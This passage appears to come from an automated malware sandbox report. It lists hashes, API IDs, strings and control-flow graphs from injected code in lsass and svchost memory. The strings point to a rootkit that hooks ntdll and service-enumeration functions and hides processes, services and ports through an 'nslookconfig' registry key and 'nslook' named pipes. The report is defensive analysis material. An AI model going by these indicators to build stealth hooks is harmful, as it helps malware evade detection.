                            • Instruction Fuzzy Hash: A911A322E54A5002F66C1129E4DEBA53440EB5E37CF55462CEF661F3DA8E3D88C19608
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: Dec$January$Oct
                            • API String ID: 3215553584-2670745533
                            • Opcode ID: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction ID: bdcf7830062aea700f3d490ffa9ef70f763b8d5f97e30f8f28fa71962fd0312d
                            • Opcode Fuzzy Hash: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction Fuzzy Hash: 8561B23260064682FE659B35A4DCB6E66A9F79D78DF14041EDB0E0F7A5DF34C8C19328
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: r-dialogbox-l1-1-0
                            • API String ID: 3215553584-4250323851
                            • Opcode ID: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction ID: 4649f9f997514f323207ffa1495ee601424e6e680e8526c3ad753c4b7871cd35
                            • Opcode Fuzzy Hash: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction Fuzzy Hash: B341F462600B8081EF259B1194CDB7A76A8E75DBECF584219EBAD4F7D6CE38C5C1C708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction ID: e85f71a24581bc7d95ca82bba9955af0ee3ae7c2ba14e39ae76acde947c1c790
                            • Opcode Fuzzy Hash: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction Fuzzy Hash: 2341A272728A8086EB209F25E48C7A977A0F798798F844129EF4D9B794EF3CC581C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction ID: 85bff6256d5d9061ee53d656d960a2c1dd0e8d0dc48dc5d5e63e1345f9992c5a
                            • Opcode Fuzzy Hash: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction Fuzzy Hash: 59110B36608B8086D764CB16B488A9AB7A4F7CDB84F54412AEFCD87B19CF38C5908B04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction ID: f23cd95b5add426011c6e79e018df6fa1a78ea792ee21c11a5a7243f4b7c53d9
                            • Opcode Fuzzy Hash: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction Fuzzy Hash: 84111C32214B8482EB258F15F488759B7E5F788B98F184225DF8D0BB68DF38C591CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction ID: 04efea30d927d977bfa8f5a6e1965247cd50753e7860c3599af33ddb181aa571
                            • Opcode Fuzzy Hash: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction Fuzzy Hash: AEF05E2521079082EB089B42B4CDE996760E78CB88F48512D9B591BB59CF38C9C5C708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction ID: 09e169d2370290b205d7a4e36ce3d48f6cf38eab89077aa25944284a77839d9f
                            • Opcode Fuzzy Hash: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction Fuzzy Hash: A1E06D75210640A2EA188B51F88DF992622E78C788F88512E9B4A0E659CE38C9C8C318
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CurrentFileModuleNameProcessProtectVirtual$CreateFindHandlePathThread_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 2570614652-925916808
                            • Opcode ID: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction ID: d1ae013908fa92126ee6757031797c06279e3bb48e1c14735a4ba13b57a348ea
                            • Opcode Fuzzy Hash: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction Fuzzy Hash: 854181B968674886FB669B21F504FDE23B1FF44F48F84482DD94946798EF3DC0148762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Open$Close$Sleep
                            • String ID:
                            • API String ID: 3308825301-0
                            • Opcode ID: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction ID: 029a89921294d6a0baba529d7f28597fcd358f65efd342ffbf0f0ecc0d19d220
                            • Opcode Fuzzy Hash: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction Fuzzy Hash: 64E0E5BC28360940FB836766AC41BDC12AC6F08FCCF94482CB949477AAED38C0541223
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction ID: 29caa52aff5cca98e2d0c68ca2156f1eff511beb25dd2c9af1f815c6e71ec185
                            • Opcode Fuzzy Hash: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction Fuzzy Hash: 0981267378269887EB568F11D860BADB7A5FF44F88F858129EE1947384DB38D826C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CloseOpen$Concurrency::cancel_current_taskEnumInfoQueryValuelstrcmpilstrlen
                            • String ID: SOFTWARE\nslookconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                            • API String ID: 2205723969-4286660177
                            • Opcode ID: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction ID: c58bb8066a65f151a000036656a05f9de6509b2fed80242e85951157a823c432
                            • Opcode Fuzzy Hash: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction Fuzzy Hash: 1DC16ABA652B188AF711DF62E840B9D37B4FB84F88F808819DB4947B59DF78C064C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction ID: 909c98b11edddad62a52aaf304efb61316b3e130d79653da166d3d3d242230ab
                            • Opcode Fuzzy Hash: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction Fuzzy Hash: 91318E7A255B848AEB619F25E8407DE37B0FB88B58F800519EA8D43BA8DF38C155CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction ID: fc12a3036a8561d052783c74c59ec7b0c05d9a3eadb3f13c4dd6905848196655
                            • Opcode Fuzzy Hash: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction Fuzzy Hash: A9D1227A745B848AF702DB64D4406DDBBB5FB44B8CF94461ACF8E47B89DA34C01AC311
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc$CurrentThread
                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                            • API String ID: 4239977575-1975688563
                            • Opcode ID: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction ID: 3e5b2724fe78ddbb8df1db7f85234bb34c61e460faa4a1eafde48577e3918a5d
                            • Opcode Fuzzy Hash: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction Fuzzy Hash: 819190BC287B0D96FB57EB15E854BDC26A5BF48F48FC4581D9909022A9EF38C158D233
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi$Pathlstrcpy$Combinelstrcatlstrcmp$FileFinalHandleNameType_invalid_parameter_noinfolstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 4069998685-1812639415
                            • Opcode ID: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction ID: f486ba0f5170a905cfabce8dbb18d4a7a91b6936a1fc17c24b3a63fa7d9a12e5
                            • Opcode Fuzzy Hash: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction Fuzzy Hash: 5CF1B4BA2426898AFB129F22D840BDD7BB1FF48F88F844819DE4947B58DF38C545C721
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: FileName$HandleModule$CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen$AddressProc
                            • String ID: NtQueryObject$\Device\Nsi$nslook$ntdll.dll
                            • API String ID: 3769777229-563693742
                            • Opcode ID: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction ID: 90659d94651a21918a60a458a439fcc906a3afe906c8bb55b984c90a793c4440
                            • Opcode Fuzzy Hash: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction Fuzzy Hash: 90F1AFBA74668886FB669F15E444BED73A0FB84F88FC4482ADE4947788DF38C444C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 443 1caf3d02630-1caf3d026c0 call 1caf3d20ce8 446 1caf3d0298d-1caf3d029aa call 1caf3d083e0 443->446 447 1caf3d026c6-1caf3d026ca 443->447 447->446 449 1caf3d026d0-1caf3d026de 447->449 449->446 451 1caf3d026e4-1caf3d0274a call 1caf3d09890 * 3 GetFileType 449->451 458 1caf3d0274c-1caf3d02753 451->458 459 1caf3d02755-1caf3d02771 GetFinalPathNameByHandleW 451->459 460 1caf3d027ae-1caf3d027b3 lstrcpyW 458->460 461 1caf3d02773-1caf3d0278f call 1caf3d0a610 459->461 462 1caf3d027b9-1caf3d027bd 459->462 460->462 461->462 469 1caf3d02791-1caf3d027a4 lstrlenW 461->469 464 1caf3d027c5-1caf3d027d0 462->464 466 1caf3d027ed 464->466 467 1caf3d027d2-1caf3d027eb 464->467 468 1caf3d027ef-1caf3d02805 call 1caf3d03b00 466->468 467->468 474 1caf3d02824-1caf3d0285b call 1caf3d03b00 lstrcmpiW 468->474 475 1caf3d02807-1caf3d0281e call 1caf3d0a610 468->475 469->462 470 1caf3d027a6 469->470 470->460 481 1caf3d0285d-1caf3d0287c lstrcpyW lstrcatW 474->481 482 1caf3d0287e-1caf3d02887 PathCombineW 474->482 475->474 480 1caf3d0291a-1caf3d0291c 475->480 484 1caf3d0291e-1caf3d02937 call 1caf3d09480 480->484 485 1caf3d02939-1caf3d0293c 480->485 483 1caf3d0288a-1caf3d02894 481->483 482->483 486 1caf3d02896-1caf3d0289d 483->486 487 1caf3d028e8-1caf3d028fa 483->487 496 1caf3d028fd-1caf3d028ff 484->496 489 1caf3d0293e-1caf3d02943 485->489 490 1caf3d02945-1caf3d02949 485->490 486->487 491 1caf3d0289f-1caf3d028a3 486->491 487->496 493 1caf3d0296d-1caf3d02985 489->493 494 1caf3d0294b-1caf3d0295d 490->494 495 1caf3d02969 490->495 491->487 498 1caf3d028a5 491->498 493->446 494->495 495->493 496->495 497 1caf3d02901 496->497 497->464 499 1caf3d028b0-1caf3d028c7 498->499 500 1caf3d028d1 lstrcmpW 499->500 501 1caf3d028c9-1caf3d028cf lstrcmpiW 499->501 502 1caf3d028d7-1caf3d028e0 500->502 501->502 503 1caf3d028e2-1caf3d028e6 502->503 504 1caf3d02906-1caf3d02912 502->504 503->487 503->499 504->480
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: FileFinalHandleNamePathTypelstrcpylstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 2439355722-1812639415
                            • Opcode ID: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction ID: 479ca83c3c4f18c3770593c6920d49440b15901b1ee9f34259a298d13cf3f49d
                            • Opcode Fuzzy Hash: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction Fuzzy Hash: 729175BA2477C886F7629F11E444BDE77A0FB84F88F844419DB8943A99DF38C545CB22
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                            • String ID: \\.\pipe\nslookchildproc32$\\.\pipe\nslookchildproc64
                            • API String ID: 2171963597-3427204187
                            • Opcode ID: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction ID: 2b2f948b5871da9d2a393709b6c432f82d9445a3f466e18cf4c53bb3dba90b5b
                            • Opcode Fuzzy Hash: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction Fuzzy Hash: D631813A24664486FB219B16F454A9E77B0FB88F98F8405299E4D03B58DF3CC559CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 517 1caf3cd7aec-1caf3cd7af2 518 1caf3cd7af4-1caf3cd7af7 517->518 519 1caf3cd7b2d-1caf3cd7b37 517->519 521 1caf3cd7af9-1caf3cd7afc 518->521 522 1caf3cd7b21-1caf3cd7b60 call 1caf3cd82c8 518->522 520 1caf3cd7c54-1caf3cd7c69 519->520 526 1caf3cd7c78-1caf3cd7c92 call 1caf3cd815c 520->526 527 1caf3cd7c6b 520->527 524 1caf3cd7b14 __scrt_dllmain_crt_thread_attach 521->524 525 1caf3cd7afe-1caf3cd7b01 521->525 537 1caf3cd7b66-1caf3cd7b7b call 1caf3cd815c 522->537 538 1caf3cd7c2e 522->538 533 1caf3cd7b19-1caf3cd7b20 524->533 529 1caf3cd7b03-1caf3cd7b0c 525->529 530 1caf3cd7b0d-1caf3cd7b12 call 1caf3cd820c 525->530 540 1caf3cd7c94-1caf3cd7cc9 call 1caf3cd8284 call 1caf3cd8124 call 1caf3cd8620 call 1caf3cd8438 call 1caf3cd845c call 1caf3cd82b4 526->540 541 1caf3cd7ccb-1caf3cd7cfc call 1caf3cd8498 526->541 531 1caf3cd7c6d-1caf3cd7c77 527->531 530->533 550 1caf3cd7c46-1caf3cd7c53 call 1caf3cd8498 537->550 551 1caf3cd7b81-1caf3cd7b92 call 1caf3cd81cc 537->551 542 1caf3cd7c30-1caf3cd7c45 538->542 540->531 552 1caf3cd7cfe-1caf3cd7d04 541->552 553 1caf3cd7d0d-1caf3cd7d13 541->553 550->520 570 1caf3cd7be3-1caf3cd7bed call 1caf3cd8438 551->570 571 1caf3cd7b94-1caf3cd7bb8 call 1caf3cd85e4 call 1caf3cd8114 call 1caf3cd8140 call 1caf3cd9d00 551->571 552->553 559 1caf3cd7d06-1caf3cd7d08 552->559 554 1caf3cd7d15-1caf3cd7d1f 553->554 555 1caf3cd7d5a-1caf3cd7d70 call 1caf3cd3320 553->555 561 1caf3cd7d21-1caf3cd7d29 554->561 562 1caf3cd7d2b-1caf3cd7d39 call 1caf3ce3748 554->562 578 1caf3cd7d72-1caf3cd7d74 555->578 579 1caf3cd7daa-1caf3cd7dac 555->579 560 1caf3cd7dfd-1caf3cd7e0a 559->560 567 1caf3cd7d3f-1caf3cd7d54 call 1caf3cd7aec 561->567 562->567 580 1caf3cd7df3-1caf3cd7dfb 562->580 567->555 567->580 570->538 591 1caf3cd7bef-1caf3cd7bfb call 1caf3cd8488 570->591 571->570 620 1caf3cd7bba-1caf3cd7bc1 __scrt_dllmain_after_initialize_c 571->620 578->580 587 1caf3cd7d76-1caf3cd7d98 call 1caf3cd3320 call 1caf3cd7c54 578->587 582 1caf3cd7db3-1caf3cd7dc8 call 1caf3cd7aec 579->582 583 1caf3cd7dae-1caf3cd7db1 579->583 580->560 582->580 601 1caf3cd7dca-1caf3cd7dd4 582->601 583->580 583->582 587->580 612 1caf3cd7d9a-1caf3cd7da8 call 1caf3ce3748 587->612 609 1caf3cd7c21-1caf3cd7c2c 591->609 610 1caf3cd7bfd-1caf3cd7c07 call 1caf3cd83a0 591->610 607 1caf3cd7dd6-1caf3cd7ddd 601->607 608 1caf3cd7ddf-1caf3cd7def call 1caf3ce3748 601->608 607->580 608->580 609->542 610->609 619 1caf3cd7c09-1caf3cd7c17 610->619 612->580 619->609 620->570 622 1caf3cd7bc3-1caf3cd7be0 call 1caf3cd9c9c 620->622 622->570
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction ID: ae32040b7b3a98bf7304c5855ef13517f9ba615d1bc882961316630ad0570e95
                            • Opcode Fuzzy Hash: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction Fuzzy Hash: 7F81B2316C668D86F753AF669471BEDA2D0AF85F8CFC4401DF92443796DA38C46F8602
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 625 1caf3d086ec-1caf3d086f2 626 1caf3d0872d-1caf3d08737 625->626 627 1caf3d086f4-1caf3d086f7 625->627 630 1caf3d08854-1caf3d08869 626->630 628 1caf3d08721-1caf3d08760 call 1caf3d08ec8 627->628 629 1caf3d086f9-1caf3d086fc 627->629 648 1caf3d0882e 628->648 649 1caf3d08766-1caf3d0877b call 1caf3d08d5c 628->649 631 1caf3d086fe-1caf3d08701 629->631 632 1caf3d08714 __scrt_dllmain_crt_thread_attach 629->632 633 1caf3d0886b 630->633 634 1caf3d08878-1caf3d08892 call 1caf3d08d5c 630->634 636 1caf3d0870d-1caf3d08712 call 1caf3d08e0c 631->636 637 1caf3d08703-1caf3d0870c 631->637 640 1caf3d08719-1caf3d08720 632->640 638 1caf3d0886d-1caf3d08877 633->638 646 1caf3d088cb-1caf3d088fc call 1caf3d09098 634->646 647 1caf3d08894-1caf3d088c9 call 1caf3d08e84 call 1caf3d08d24 call 1caf3d09220 call 1caf3d09038 call 1caf3d0905c call 1caf3d08eb4 634->647 636->640 659 1caf3d0890d-1caf3d08913 646->659 660 1caf3d088fe-1caf3d08904 646->660 647->638 652 1caf3d08830-1caf3d08845 648->652 657 1caf3d08781-1caf3d08792 call 1caf3d08dcc 649->657 658 1caf3d08846-1caf3d08853 call 1caf3d09098 649->658 675 1caf3d087e3-1caf3d087ed call 1caf3d09038 657->675 676 1caf3d08794-1caf3d087b8 call 1caf3d091e4 call 1caf3d08d14 call 1caf3d08d40 call 1caf3d0a900 657->676 658->630 665 1caf3d0895a-1caf3d08970 call 1caf3d03f20 659->665 666 1caf3d08915-1caf3d0891f 659->666 660->659 664 1caf3d08906-1caf3d08908 660->664 671 1caf3d089fd-1caf3d08a0a 664->671 684 1caf3d089aa-1caf3d089ac 665->684 685 1caf3d08972-1caf3d08974 665->685 672 1caf3d0892b-1caf3d08939 call 1caf3d14348 666->672 673 1caf3d08921-1caf3d08929 666->673 678 1caf3d0893f-1caf3d08954 call 1caf3d086ec 672->678 690 1caf3d089f3-1caf3d089fb 672->690 673->678 675->648 698 1caf3d087ef-1caf3d087fb call 1caf3d09088 675->698 676->675 728 1caf3d087ba-1caf3d087c1 __scrt_dllmain_after_initialize_c 676->728 678->665 678->690 688 1caf3d089ae-1caf3d089b1 684->688 689 1caf3d089b3-1caf3d089c8 call 1caf3d086ec 684->689 685->690 695 1caf3d08976-1caf3d08998 call 1caf3d03f20 call 1caf3d08854 685->695 688->689 688->690 689->690 708 1caf3d089ca-1caf3d089d4 689->708 690->671 695->690 722 1caf3d0899a-1caf3d089a8 call 1caf3d14348 695->722 715 1caf3d087fd-1caf3d08807 call 1caf3d08fa0 698->715 716 1caf3d08821-1caf3d0882c 698->716 713 1caf3d089df-1caf3d089ef call 1caf3d14348 708->713 714 1caf3d089d6-1caf3d089dd 708->714 713->690 714->690 715->716 727 1caf3d08809-1caf3d08817 715->727 716->652 722->690 727->716 728->675 730 1caf3d087c3-1caf3d087e0 call 1caf3d0a89c 728->730 730->675
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction ID: 26e4a7482ee748f6d49e957ffcbf55cc9b87a1f0ca93e730d4e269044a28936e
                            • Opcode Fuzzy Hash: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction Fuzzy Hash: 5181E5FDA8224D8AF756AB25A441FDD66A0BF85F8CFC44D1D9A444339EDA38C4418733
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

